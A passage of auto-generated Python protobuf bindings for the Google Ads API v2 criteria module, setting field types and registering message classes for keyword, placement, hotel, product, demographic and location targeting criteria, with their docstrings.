_LISTINGDIMENSIONINFO.fields_by_name['product_item_id'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_type'])
_LISTINGDIMENSIONINFO.fields_by_name['product_type'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['unknown_listing_dimension'])
_LISTINGDIMENSIONINFO.fields_by_name['unknown_listing_dimension'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGBRANDINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELIDINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELCLASSINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELCOUNTRYREGIONINFO.fields_by_name['country_region_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELSTATEINFO.fields_by_name['state_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELCITYINFO.fields_by_name['city_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LISTINGCUSTOMATTRIBUTEINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LISTINGCUSTOMATTRIBUTEINFO.fields_by_name['index'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__custom__attribute__index__pb2._LISTINGCUSTOMATTRIBUTEINDEXENUM_LISTINGCUSTOMATTRIBUTEINDEX
_PRODUCTBIDDINGCATEGORYINFO.fields_by_name['id'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_PRODUCTBIDDINGCATEGORYINFO.fields_by_name['country_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PRODUCTBIDDINGCATEGORYINFO.fields_by_name['level'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__bidding__category__level__pb2._PRODUCTBIDDINGCATEGORYLEVELENUM_PRODUCTBIDDINGCATEGORYLEVEL
_PRODUCTCHANNELINFO.fields_by_name['channel'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__pb2._PRODUCTCHANNELENUM_PRODUCTCHANNEL
_PRODUCTCHANNELEXCLUSIVITYINFO.fields_by_name['channel_exclusivity'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__exclusivity__pb2._PRODUCTCHANNELEXCLUSIVITYENUM_PRODUCTCHANNELEXCLUSIVITY
_PRODUCTCONDITIONINFO.fields_by_name['condition'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__condition__pb2._PRODUCTCONDITIONENUM_PRODUCTCONDITION
_PRODUCTITEMIDINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PRODUCTTYPEINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PRODUCTTYPEINFO.fields_by_name['level'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__type__level__pb2._PRODUCTTYPELEVELENUM_PRODUCTTYPELEVEL
_HOTELDATESELECTIONTYPEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_hotel__date__selection__type__pb2._HOTELDATESELECTIONTYPEENUM_HOTELDATESELECTIONTYPE
_HOTELADVANCEBOOKINGWINDOWINFO.fields_by_name['min_days'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELADVANCEBOOKINGWINDOWINFO.fields_by_name['max_days'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELLENGTHOFSTAYINFO.fields_by_name['min_nights'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELLENGTHOFSTAYINFO.fields_by_name['max_nights'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELCHECKINDAYINFO.fields_by_name['day_of_week'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2._DAYOFWEEKENUM_DAYOFWEEK
_INTERACTIONTYPEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_interaction__type__pb2._INTERACTIONTYPEENUM_INTERACTIONTYPE
_ADSCHEDULEINFO.fields_by_name['start_minute'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2._MINUTEOFHOURENUM_MINUTEOFHOUR
_ADSCHEDULEINFO.fields_by_name['end_minute'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2._MINUTEOFHOURENUM_MINUTEOFHOUR
_ADSCHEDULEINFO.fields_by_name['start_hour'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_ADSCHEDULEINFO.fields_by_name['end_hour'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_ADSCHEDULEINFO.fields_by_name['day_of_week'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2._DAYOFWEEKENUM_DAYOFWEEK
_AGERANGEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_age__range__type__pb2._AGERANGETYPEENUM_AGERANGETYPE
_GENDERINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_gender__type__pb2._GENDERTYPEENUM_GENDERTYPE
_INCOMERANGEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_income__range__type__pb2._INCOMERANGETYPEENUM_INCOMERANGETYPE
_PARENTALSTATUSINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_parental__status__type__pb2._PARENTALSTATUSTYPEENUM_PARENTALSTATUSTYPE
_YOUTUBEVIDEOINFO.fields_by_name['video_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_YOUTUBECHANNELINFO.fields_by_name['channel_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_USERLISTINFO.fields_by_name['user_list'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PROXIMITYINFO.fields_by_name['geo_point'].message_type = _GEOPOINTINFO
_PROXIMITYINFO.fields_by_name['radius'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_PROXIMITYINFO.fields_by_name['radius_units'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_proximity__radius__units__pb2._PROXIMITYRADIUSUNITSENUM_PROXIMITYRADIUSUNITS
_PROXIMITYINFO.fields_by_name['address'].message_type = _ADDRESSINFO
_GEOPOINTINFO.fields_by_name['longitude_in_micro_degrees'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_GEOPOINTINFO.fields_by_name['latitude_in_micro_degrees'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_ADDRESSINFO.fields_by_name['postal_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['province_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['country_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['province_name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['street_address'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['street_address2'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['city_name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_TOPICINFO.fields_by_name['topic_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_TOPICINFO.fields_by_name['path'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LANGUAGEINFO.fields_by_name['language_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_IPBLOCKINFO.fields_by_name['ip_address'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_CONTENTLABELINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_content__label__type__pb2._CONTENTLABELTYPEENUM_CONTENTLABELTYPE
_CARRIERINFO.fields_by_name['carrier_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_USERINTERESTINFO.fields_by_name['user_interest_category'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_WEBPAGEINFO.fields_by_name['criterion_name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_WEBPAGEINFO.fields_by_name['conditions'].message_type = _WEBPAGECONDITIONINFO
_WEBPAGECONDITIONINFO.fields_by_name['operand'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operand__pb2._WEBPAGECONDITIONOPERANDENUM_WEBPAGECONDITIONOPERAND
_WEBPAGECONDITIONINFO.fields_by_name['operator'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operator__pb2._WEBPAGECONDITIONOPERATORENUM_WEBPAGECONDITIONOPERATOR
_WEBPAGECONDITIONINFO.fields_by_name['argument'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_OPERATINGSYSTEMVERSIONINFO.fields_by_name['operating_system_version_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_APPPAYMENTMODELINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_app__payment__model__type__pb2._APPPAYMENTMODELTYPEENUM_APPPAYMENTMODELTYPE
_MOBILEDEVICEINFO.fields_by_name['mobile_device_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_CUSTOMAFFINITYINFO.fields_by_name['custom_affinity'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_CUSTOMINTENTINFO.fields_by_name['custom_intent'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONGROUPINFO.fields_by_name['feed'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONGROUPINFO.fields_by_name['geo_target_constants'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONGROUPINFO.fields_by_name['radius'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_LOCATIONGROUPINFO.fields_by_name['radius_units'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_location__group__radius__units__pb2._LOCATIONGROUPRADIUSUNITSENUM_LOCATIONGROUPRADIUSUNITS
DESCRIPTOR.message_types_by_name['KeywordInfo'] = _KEYWORDINFO
DESCRIPTOR.message_types_by_name['PlacementInfo'] = _PLACEMENTINFO
DESCRIPTOR.message_types_by_name['MobileAppCategoryInfo'] = _MOBILEAPPCATEGORYINFO
DESCRIPTOR.message_types_by_name['MobileApplicationInfo'] = _MOBILEAPPLICATIONINFO
DESCRIPTOR.message_types_by_name['LocationInfo'] = _LOCATIONINFO
DESCRIPTOR.message_types_by_name['DeviceInfo'] = _DEVICEINFO
DESCRIPTOR.message_types_by_name['PreferredContentInfo'] = _PREFERREDCONTENTINFO
DESCRIPTOR.message_types_by_name['ListingGroupInfo'] = _LISTINGGROUPINFO
DESCRIPTOR.message_types_by_name['ListingScopeInfo'] = _LISTINGSCOPEINFO
DESCRIPTOR.message_types_by_name['ListingDimensionInfo'] = _LISTINGDIMENSIONINFO
DESCRIPTOR.message_types_by_name['ListingBrandInfo'] = _LISTINGBRANDINFO
DESCRIPTOR.message_types_by_name['HotelIdInfo'] = _HOTELIDINFO
DESCRIPTOR.message_types_by_name['HotelClassInfo'] = _HOTELCLASSINFO
DESCRIPTOR.message_types_by_name['HotelCountryRegionInfo'] = _HOTELCOUNTRYREGIONINFO
DESCRIPTOR.message_types_by_name['HotelStateInfo'] = _HOTELSTATEINFO
DESCRIPTOR.message_types_by_name['HotelCityInfo'] = _HOTELCITYINFO
DESCRIPTOR.message_types_by_name['ListingCustomAttributeInfo'] = _LISTINGCUSTOMATTRIBUTEINFO
DESCRIPTOR.message_types_by_name['ProductBiddingCategoryInfo'] = _PRODUCTBIDDINGCATEGORYINFO
DESCRIPTOR.message_types_by_name['ProductChannelInfo'] = _PRODUCTCHANNELINFO
DESCRIPTOR.message_types_by_name['ProductChannelExclusivityInfo'] = _PRODUCTCHANNELEXCLUSIVITYINFO
DESCRIPTOR.message_types_by_name['ProductConditionInfo'] = _PRODUCTCONDITIONINFO
DESCRIPTOR.message_types_by_name['ProductItemIdInfo'] = _PRODUCTITEMIDINFO
DESCRIPTOR.message_types_by_name['ProductTypeInfo'] = _PRODUCTTYPEINFO
DESCRIPTOR.message_types_by_name['UnknownListingDimensionInfo'] = _UNKNOWNLISTINGDIMENSIONINFO
DESCRIPTOR.message_types_by_name['HotelDateSelectionTypeInfo'] = _HOTELDATESELECTIONTYPEINFO
DESCRIPTOR.message_types_by_name['HotelAdvanceBookingWindowInfo'] = _HOTELADVANCEBOOKINGWINDOWINFO
DESCRIPTOR.message_types_by_name['HotelLengthOfStayInfo'] = _HOTELLENGTHOFSTAYINFO
DESCRIPTOR.message_types_by_name['HotelCheckInDayInfo'] = _HOTELCHECKINDAYINFO
DESCRIPTOR.message_types_by_name['InteractionTypeInfo'] = _INTERACTIONTYPEINFO
DESCRIPTOR.message_types_by_name['AdScheduleInfo'] = _ADSCHEDULEINFO
DESCRIPTOR.message_types_by_name['AgeRangeInfo'] = _AGERANGEINFO
DESCRIPTOR.message_types_by_name['GenderInfo'] = _GENDERINFO
DESCRIPTOR.message_types_by_name['IncomeRangeInfo'] = _INCOMERANGEINFO
DESCRIPTOR.message_types_by_name['ParentalStatusInfo'] = _PARENTALSTATUSINFO
DESCRIPTOR.message_types_by_name['YouTubeVideoInfo'] = _YOUTUBEVIDEOINFO
DESCRIPTOR.message_types_by_name['YouTubeChannelInfo'] = _YOUTUBECHANNELINFO
DESCRIPTOR.message_types_by_name['UserListInfo'] = _USERLISTINFO
DESCRIPTOR.message_types_by_name['ProximityInfo'] = _PROXIMITYINFO
DESCRIPTOR.message_types_by_name['GeoPointInfo'] = _GEOPOINTINFO
DESCRIPTOR.message_types_by_name['AddressInfo'] = _ADDRESSINFO
DESCRIPTOR.message_types_by_name['TopicInfo'] = _TOPICINFO
DESCRIPTOR.message_types_by_name['LanguageInfo'] = _LANGUAGEINFO
DESCRIPTOR.message_types_by_name['IpBlockInfo'] = _IPBLOCKINFO
DESCRIPTOR.message_types_by_name['ContentLabelInfo'] = _CONTENTLABELINFO
DESCRIPTOR.message_types_by_name['CarrierInfo'] = _CARRIERINFO
DESCRIPTOR.message_types_by_name['UserInterestInfo'] = _USERINTERESTINFO
DESCRIPTOR.message_types_by_name['WebpageInfo'] = _WEBPAGEINFO
DESCRIPTOR.message_types_by_name['WebpageConditionInfo'] = _WEBPAGECONDITIONINFO
DESCRIPTOR.message_types_by_name['OperatingSystemVersionInfo'] = _OPERATINGSYSTEMVERSIONINFO
DESCRIPTOR.message_types_by_name['AppPaymentModelInfo'] = _APPPAYMENTMODELINFO
DESCRIPTOR.message_types_by_name['MobileDeviceInfo'] = _MOBILEDEVICEINFO
DESCRIPTOR.message_types_by_name['CustomAffinityInfo'] = _CUSTOMAFFINITYINFO
DESCRIPTOR.message_types_by_name['CustomIntentInfo'] = _CUSTOMINTENTINFO
DESCRIPTOR.message_types_by_name['LocationGroupInfo'] = _LOCATIONGROUPINFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
KeywordInfo = _reflection.GeneratedProtocolMessageType('KeywordInfo', (_message.Message,), dict(
DESCRIPTOR = _KEYWORDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A keyword criterion.
Attributes:
text:
The text of the keyword (at most 80 characters and 10 words).
match_type:
The match type of the keyword.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.KeywordInfo)
))
_sym_db.RegisterMessage(KeywordInfo)
PlacementInfo = _reflection.GeneratedProtocolMessageType('PlacementInfo', (_message.Message,), dict(
DESCRIPTOR = _PLACEMENTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A placement criterion. This can be used to modify bids for sites when
targeting the content network.
Attributes:
url:
URL of the placement. For example, "http://www.domain.com".
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.PlacementInfo)
))
_sym_db.RegisterMessage(PlacementInfo)
MobileAppCategoryInfo = _reflection.GeneratedProtocolMessageType('MobileAppCategoryInfo', (_message.Message,), dict(
DESCRIPTOR = _MOBILEAPPCATEGORYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A mobile app category criterion.
Attributes:
mobile_app_category_constant:
The mobile app category constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.MobileAppCategoryInfo)
))
_sym_db.RegisterMessage(MobileAppCategoryInfo)
MobileApplicationInfo = _reflection.GeneratedProtocolMessageType('MobileApplicationInfo', (_message.Message,), dict(
DESCRIPTOR = _MOBILEAPPLICATIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A mobile application criterion.
Attributes:
app_id:
A string that uniquely identifies a mobile application to
Google Ads API. The format of this string is
"{platform}-{platform\_native\_id}", where platform is "1" for
iOS apps and "2" for Android apps, and where
platform\_native\_id is the mobile application identifier
native to the corresponding platform. For iOS, this native
identifier is the 9 digit string that appears at the end of an
App Store URL (e.g., "476943146" for "Flood-It! 2" whose App
Store link is http://itunes.apple.com/us/app/flood-
it!-2/id476943146). For Android, this native identifier is the
application's package name (e.g., "com.labpixies.colordrips"
for "Color Drips" given Google Play link https://play.google.c
om/store/apps/details?id=com.labpixies.colordrips). A well
formed app id for Google Ads API would thus be "1-476943146"
for iOS and "2-com.labpixies.colordrips" for Android. This
field is required and must be set in CREATE operations.
name:
Name of this mobile application.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.MobileApplicationInfo)
))
_sym_db.RegisterMessage(MobileApplicationInfo)
LocationInfo = _reflection.GeneratedProtocolMessageType('LocationInfo', (_message.Message,), dict(
DESCRIPTOR = _LOCATIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A location criterion.
Attributes:
geo_target_constant:
The geo target constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.LocationInfo)
))
_sym_db.RegisterMessage(LocationInfo)
DeviceInfo = _reflection.GeneratedProtocolMessageType('DeviceInfo', (_message.Message,), dict(
DESCRIPTOR = _DEVICEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A device criterion.
Attributes:
type:
Type of the device.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.DeviceInfo)
))
_sym_db.RegisterMessage(DeviceInfo)
PreferredContentInfo = _reflection.GeneratedProtocolMessageType('PreferredContentInfo', (_message.Message,), dict(
DESCRIPTOR = _PREFERREDCONTENTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A preferred content criterion.
Attributes:
type:
Type of the preferred content.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.PreferredContentInfo)
))
_sym_db.RegisterMessage(PreferredContentInfo)
ListingGroupInfo = _reflection.GeneratedProtocolMessageType('ListingGroupInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGGROUPINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A listing group criterion.
Attributes:
type:
Type of the listing group.
case_value:
Dimension value with which this listing group is refining its
parent. Undefined for the root group.
parent_ad_group_criterion:
Resource name of ad group criterion which is the parent
listing group subdivision. Null for the root group.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingGroupInfo)
))
_sym_db.RegisterMessage(ListingGroupInfo)
ListingScopeInfo = _reflection.GeneratedProtocolMessageType('ListingScopeInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGSCOPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A listing scope criterion.
Attributes:
dimensions:
Scope of the campaign criterion.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingScopeInfo)
))
_sym_db.RegisterMessage(ListingScopeInfo)
ListingDimensionInfo = _reflection.GeneratedProtocolMessageType('ListingDimensionInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGDIMENSIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Listing dimensions for listing group criterion.
Attributes:
dimension:
Dimension of one of the types below is always present.
listing_brand:
Brand of the listing.
hotel_id:
Advertiser-specific hotel ID.
hotel_class:
Class of the hotel as a number of stars 1 to 5.
hotel_country_region:
Country or Region the hotel is located in.
hotel_state:
State the hotel is located in.
hotel_city:
City the hotel is located in.
listing_custom_attribute:
Listing custom attribute.
product_bidding_category:
Bidding category of a product offer.
product_channel:
Locality of a product offer.
product_channel_exclusivity:
Availability of a product offer.
product_condition:
Condition of a product offer.
product_item_id:
Item id of a product offer.
product_type:
Type of a product offer.
unknown_listing_dimension:
Unknown dimension. Set when no other listing dimension is set.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingDimensionInfo)
))
_sym_db.RegisterMessage(ListingDimensionInfo)
ListingBrandInfo = _reflection.GeneratedProtocolMessageType('ListingBrandInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGBRANDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Brand of the listing.
Attributes:
value:
String value of the listing brand.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingBrandInfo)
))
_sym_db.RegisterMessage(ListingBrandInfo)
HotelIdInfo = _reflection.GeneratedProtocolMessageType('HotelIdInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELIDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Advertiser-specific hotel ID.
Attributes:
value:
String value of the hotel ID.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelIdInfo)
))
_sym_db.RegisterMessage(HotelIdInfo)
HotelClassInfo = _reflection.GeneratedProtocolMessageType('HotelClassInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCLASSINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Class of the hotel as a number of stars 1 to 5.
Attributes:
value:
Long value of the hotel class.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelClassInfo)
))
_sym_db.RegisterMessage(HotelClassInfo)
HotelCountryRegionInfo = _reflection.GeneratedProtocolMessageType('HotelCountryRegionInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCOUNTRYREGIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Country or Region the hotel is located in.
Attributes:
country_region_criterion:
The Geo Target Constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelCountryRegionInfo)
))
_sym_db.RegisterMessage(HotelCountryRegionInfo)
HotelStateInfo = _reflection.GeneratedProtocolMessageType('HotelStateInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELSTATEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """State the hotel is located in.
Attributes:
state_criterion:
The Geo Target Constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelStateInfo)
))
_sym_db.RegisterMessage(HotelStateInfo)
HotelCityInfo = _reflection.GeneratedProtocolMessageType('HotelCityInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """City the hotel is located in.
Attributes:
city_criterion:
The Geo Target Constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelCityInfo)
))
_sym_db.RegisterMessage(HotelCityInfo)
ListingCustomAttributeInfo = _reflection.GeneratedProtocolMessageType('ListingCustomAttributeInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGCUSTOMATTRIBUTEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Listing custom attribute.
Attributes:
value:
String value of the listing custom attribute.
index:
Indicates the index of the custom attribute.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingCustomAttributeInfo)
))
_sym_db.RegisterMessage(ListingCustomAttributeInfo)
ProductBiddingCategoryInfo = _reflection.GeneratedProtocolMessageType('ProductBiddingCategoryInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTBIDDINGCATEGORYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Bidding category of a product offer.
Attributes:
id:
ID of the product bidding category. This ID is equivalent to
the google\_product\_category ID as described in this article:
https://support.google.com/merchants/answer/6324436.
country_code:
Two-letter upper-case country code of the product bidding
category. It must match the
campaign.shopping\_setting.sales\_country field.
level:
Level of the product bidding category.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductBiddingCategoryInfo)
))
_sym_db.RegisterMessage(ProductBiddingCategoryInfo)
ProductChannelInfo = _reflection.GeneratedProtocolMessageType('ProductChannelInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTCHANNELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Locality of a product offer.
Attributes:
channel:
Value of the locality.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductChannelInfo)
))
_sym_db.RegisterMessage(ProductChannelInfo)
ProductChannelExclusivityInfo = _reflection.GeneratedProtocolMessageType('ProductChannelExclusivityInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTCHANNELEXCLUSIVITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Availability of a product offer.
Attributes:
channel_exclusivity:
Value of the availability.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductChannelExclusivityInfo)
))
_sym_db.RegisterMessage(ProductChannelExclusivityInfo)
ProductConditionInfo = _reflection.GeneratedProtocolMessageType('ProductConditionInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTCONDITIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Condition of a product offer.
Attributes:
condition:
Value of the condition.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductConditionInfo)
))
_sym_db.RegisterMessage(ProductConditionInfo)
ProductItemIdInfo = _reflection.GeneratedProtocolMessageType('ProductItemIdInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTITEMIDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Item id of a product offer.
Attributes:
value:
Value of the id.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductItemIdInfo)
))
_sym_db.RegisterMessage(ProductItemIdInfo)
ProductTypeInfo = _reflection.GeneratedProtocolMessageType('ProductTypeInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTTYPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Type of a product offer.
Attributes:
value:
Value of the type.
level:
Level of the type.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductTypeInfo)
))
_sym_db.RegisterMessage(ProductTypeInfo)
UnknownListingDimensionInfo = _reflection.GeneratedProtocolMessageType('UnknownListingDimensionInfo', (_message.Message,), dict(
DESCRIPTOR = _UNKNOWNLISTINGDIMENSIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Unknown listing dimension.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.UnknownListingDimensionInfo)
))
_sym_db.RegisterMessage(UnknownListingDimensionInfo)
HotelDateSelectionTypeInfo = _reflection.GeneratedProtocolMessageType('HotelDateSelectionTypeInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELDATESELECTIONTYPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for hotel date selection (default dates vs. user selected).
Attributes:
type:
Type of the hotel date selection
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelDateSelectionTypeInfo)
))
_sym_db.RegisterMessage(HotelDateSelectionTypeInfo)
HotelAdvanceBookingWindowInfo = _reflection.GeneratedProtocolMessageType('HotelAdvanceBookingWindowInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELADVANCEBOOKINGWINDOWINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for number of days prior to the stay the booking is being
made.
